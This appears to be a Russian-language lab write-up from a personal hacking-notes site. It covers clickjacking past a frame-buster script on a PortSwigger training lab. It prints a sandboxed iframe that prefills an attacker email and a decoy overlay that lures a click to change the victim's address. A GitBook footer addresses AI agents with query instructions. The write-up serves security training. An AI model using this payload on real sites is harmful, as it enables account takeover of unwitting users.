> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/clickjacking/clickjacking-with-frame-buster-script.md).

# Кликджекинг со скриптом анти-фрейм

### Кликджекинг со скриптом-фрейм-бастером

Выполните атаку кликджекинга, которая изменит адрес электронной почты пользователя, несмотря на наличие «фрейм-бастера». Лаборатория считается решённой, когда адрес электронной почты учётной записи будет изменён.

#### Предоставленные учетные данные

* Пользователь: `wiener`
* Пароль: `peter`

#### Начальное наблюдение

Попытка отобразить страницу учетной записи в классическом `<iframe>`, страница возвращает следующий контент (пример д

{% code overflow="wrap" %}

```html
<iframe src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=wiener"</iframe>
```

{% endcode %}

<figure><img src="/files/3c7e84fc50af047f35fa4a223d8e28639394b790" alt=""><figcaption></figcaption></figure>

#### Наблюдаемая защита (фрейм-бастер)

На странице есть скрипт, который предотвращает встраивание в фрейм и заменяет тело документа, если страница загружена во фрейме:

```javascript
if(top != self) {
 window.addEventListener("DOMContentLoaded", function() {
 document.body.innerHTML = 'Эту страницу нельзя встраивать во фрейм';
 }, false);
}
```

Этот механизм определяет, когда страница находится во фрейме iframe, и нейтрализует отображаемый контент.

{% code overflow="wrap" %}

```html
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=jordan@hacked.com"</iframe>
```

{% endcode %}

<figure><img src="/files/7ae765b8981a1d2511b6ca7734eaf46cb06a6ff6" alt=""><figcaption></figcaption></figure>

Пример стиля и слоя приманки, использованных

```javascript
<style>
iframe{
width: 500px;
height: 600px;
}
div{
position: relative;
top: 455px;
left: 80px;
}
</style>
<div>Нажми</div>
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=jordan@hacked.com"</iframe>
```

<figure><img src="/files/c024d038ee057ae1315560ff195207d9f319317c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/clickjacking/clickjacking-with-frame-buster-script.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
